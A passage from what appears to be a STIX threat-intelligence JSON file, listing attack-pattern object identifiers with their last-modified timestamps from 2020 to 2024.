"2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "object_modified": "2024-03-01T15:35:38.299Z"}, {"object_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "object_modified": "2024-04-16T12:28:59.928Z"}, {"object_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", "object_modified": "2022-10-18T22:45:19.607Z"}, {"object_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "object_modified": "2024-04-15T23:00:33.493Z"}, {"object_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", "object_modified": "2023-10-03T03:44:46.935Z"}, {"object_ref": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", "object_modified": "2023-10-13T17:57:05.576Z"}, {"object_ref": "attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92", "object_modified": "2024-04-11T21:24:42.680Z"}, {"object_ref": "attack-pattern--56fca983-1cf1-4fd1-bda0-5e170a37ab59", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "object_modified": "2023-08-14T19:19:54.148Z"}, {"object_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761", "object_modified": "2023-12-14T16:28:24.680Z"}, {"object_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "object_modified": "2023-10-13T17:57:05.776Z"}, {"object_ref": "attack-pattern--5ad95aaa-49c1-4784-821d-2e83f47b079b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "object_modified": "2024-02-26T14:21:37.818Z"}, {"object_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "object_modified": "2023-03-30T21:01:53.857Z"}, {"object_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "object_modified": "2024-04-16T12:45:06.434Z"}, {"object_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "object_modified": "2023-10-13T17:57:05.975Z"}, {"object_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", "object_modified": "2023-10-13T17:57:06.171Z"}, {"object_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "object_modified": "2023-04-12T23:52:08.194Z"}, {"object_ref": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", "object_modified": "2024-02-28T21:22:52.176Z"}, {"object_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "object_modified": "2023-08-11T15:26:41.941Z"}, {"object_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "object_modified": "2024-03-07T14:27:04.770Z"}, {"object_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", "object_modified": "2024-04-12T02:34:58.003Z"}, {"object_ref": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "object_modified": "2023-10-16T17:40:37.995Z"}, {"object_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", "object_modified": "2023-10-13T17:57:06.362Z"}, {"object_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "object_modified": "2024-01-31T03:17:42.004Z"}, {"object_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", "object_modified": "2023-10-13T17:57:06.577Z"}, {"object_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "object_modified": "2024-04-16T12:40:58.536Z"}, {"object_ref": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", "object_modified": "2024-02-28T21:11:27.088Z"}, {"object_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", "object_modified": "2023-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", "object_modified": "2023-12-27T17:57:20.003Z"}, {"object_ref": "attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "object_modified": "2024-04-15T20:52:09.908Z"}, {"object_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", "object_modified": "2024-02-14T21:24:37.780Z"}, {"object_ref": "attack-pattern--6856ddd6-2df3-4379-8b87-284603c189c3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", "object_modified": "2023-08-11T20:21:55.610Z"}, {"object_ref": "attack-pattern--68c96494-1a50-403e-8844-69a6af278c68", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "object_modified": "2024-03-07T14:33:34.201Z"}, {"object_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "object_modified": "2024-04-16T12:19:08.953Z"}, {"object_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "object_modified": "2023-03-30T21:01:46.711Z"}, {"object_ref": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", "object_modified": "2022-10-21T14:30:10.979Z"}, {"object_ref": "attack-pattern--6a3be63a-64c5-4678-a036-03ff8fc35300", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289", "object_modified": "2023-09-08T21:03:35.477Z"}, {"object_ref": "attack-pattern--6aabc5ec-eae6-422c-8311-38d45ee9838a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "object_modified": "2024-04-18T23:47:54.553Z"}, {"object_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", "object_modified": "2023-10-03T17:38:21.121Z"}, {"object_ref": "attack-pattern--6be14413-578e-46c1-8304-310762b3ecd5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6c174520-beea-43d9-aac6-28fb77f3e446", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6e6845c2-347a-4a6f-a2d1-b74a18ebd352", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", "object_modified": "2024-03-28T15:30:09.313Z"}, {"object_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--6fb6408c-0db3-41d9-a3a1-a32e5f16454e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--6ff403bc-93e3-48be-8687-e102fdba8c88", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "object_modified": "2023-07-28T14:40:54.580Z"}, {"object_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--70910fbd-58dc-4c1c-8c48-814d11fcd022", "object_modified": "2022-10-26T18:01:20.520Z"}, {"object_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", "object_modified": "2020-10-27T14:49:39.188Z"}, {"object_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--723e3a2b-ca0d-4daa-ada8-82ea35d3733a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--72b5ef57-325c-411b-93ca-a3ca6fa17e31", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "object_modified": "2024-01-12T23:36:56.245Z"}, {"object_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "object_modified": "2024-02-14T21:50:32.531Z"}, {"object_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "object_modified": "2024-02-01T04:37:36.774Z"}, {"object_ref": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--772bc7a8-a157-42cc-8728-d648e25c7fe7", "object_modified": "2021-01-27T14:49:39.188Z"}, {"object_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "object_modified": "2024-01-24T00:04:01.066Z"}, {"object_ref": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", "object_modified": "2023-04-15T00:25:36.502Z"}, {"object_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", "object_modified": "2024-04-08T18:54:40.925Z"}, {"object_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", "object_modified": "2023-10-13T17:57:06.780Z"}, {"object_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "object_modified": "2024-04-16T12:40:10.978Z"}, {"object_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "object_modified": "2023-09-29T20:30:58.300Z"}, {"object_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", "object_modified": "2023-04-14T23:23:30.327Z"}, {"object_ref": "attack-pattern--7c93aa74-4bc0-4a9e-90ea-f25f86301566", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7d751199-05fa-4a72-920f-85df4506c76c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", "object_modified": "2023-10-03T17:38:39.065Z"}, {"object_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "object_modified": "2024-03-28T03:53:28.299Z"}, {"object_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", "object_modified": "2023-03-22T14:19:50.768Z"}, {"object_ref": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "object_modified": "2024-02-26T14:26:14.364Z"}, {"object_ref": "attack-pattern--7fd87010-3a00-4da3-b905-410525e8ec44", "object_modified": "2021-01-27T14:49:39.188Z"}, {"object_ref": "attack-pattern--800f9819-7007-4540-a520-40e655876800", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--804c042c-cfe6-449e-bc1a-ba0a998a70db", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", "object_modified": "2022-10-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "object_modified": "2023-10-03T16:40:15.445Z"}, {"object_ref": "attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "object_modified": "2024-04-15T21:33:00.213Z"}, {"object_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", "object_modified": "2023-10-13T17:57:06.993Z"}, {"object_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--84601337-6a55-4ad7-9c35-79e0d1ea2ab3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", "object_modified": "2022-10-19T22:01:05.551Z"}, {"object_ref": "attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701", "object_modified": "2024-04-28T15:57:26.842Z"}, {"object_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "object_modified": "2024-04-11T20:22:14.359Z"}, {"object_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "object_modified": "2023-10-13T17:57:07.260Z"}, {"object_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--8565825b-21c8-4518-b75e-cbc4c717a156", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "object_modified": "2023-10-13T17:57:07.457Z"}, {"object_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "object_modified": "2023-09-19T21:25:10.511Z"}, {"object_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "object_modified": "2023-09-30T22:18:46.711Z"}, {"object_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", "object_modified": "2024-01-10T17:57:36.177Z"}, {"object_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "object_modified": "2023-09-15T19:08:16.882Z"}, {"object_ref": "attack-pattern--8861073d-d1b8-4941-82ce-dce621d398f0", "object_modified": "2023-04-14T22:27:04.095Z"}, {"object_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", "object_modified": "2023-10-17T02:12:05.242Z"}, {"object_ref": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", "object_modified": "2024-01-16T22:47:59.395Z"}, {"object_ref": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a", "object_modified": "2024-03-24T19:41:54.832Z"}, {"object_ref": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "object_modified": "2024-02-28T14:35:00.862Z"}, {"object_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "object_modified": "2023-10-13T17:57:07.653Z"}, {"object_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "object_modified": "2024-04-12T03:46:49.507Z"}, {"object_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", "object_modified": "2024-01-10T17:55:46.905Z"}, {"object_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", "object_modified": "2023-10-13T17:57:07.840Z"}, {"object_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--8df54627-376c-487c-a09c-7d2b5620f56e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", "object_modified": "2023-10-13T17:57:08.037Z"}, {"object_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "object_modified": "2024-04-16T12:43:55.369Z"}, {"object_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", "object_modified": "2024-04-13T14:08:20.882Z"}, {"object_ref": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--91ce1ede-107f-4d8b-bf4c-735e8789c94b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--926d8cfd-1d0d-4da2-ab49-3ca10ec3f3b5", "object_modified": "2022-10-25T15:49:14.785Z"}, {"object_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "object_modified": "2024-04-12T03:40:37.954Z"}, {"object_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--9422fc14-1c43-410d-ab0f-a709b76c72dc", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "object_modified": "2023-10-15T11:10:03.428Z"}, {"object_ref": "attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "object_modified": "2024-04-19T04:26:29.365Z"}, {"object_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "object_modified": "2024-04-16T13:03:40.824Z"}, {"object_ref": "attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3", "object_modified": "2023-04-11T00:34:00.779Z"}, {"object_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "object_modified": "2024-03-01T18:01:37.575Z"}, {"object_ref": "attack-pattern--970cdb5c-02fb-4c38-b17e-d6327cf3c810", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "object_modified": "2023-10-13T17:57:08.233Z"}, {"object_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "object_modified": "2024-01-18T17:23:22.591Z"}, {"object_ref": "attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "object_modified": "2023-10-15T11:45:21.555Z"}, {"object_ref": "attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", 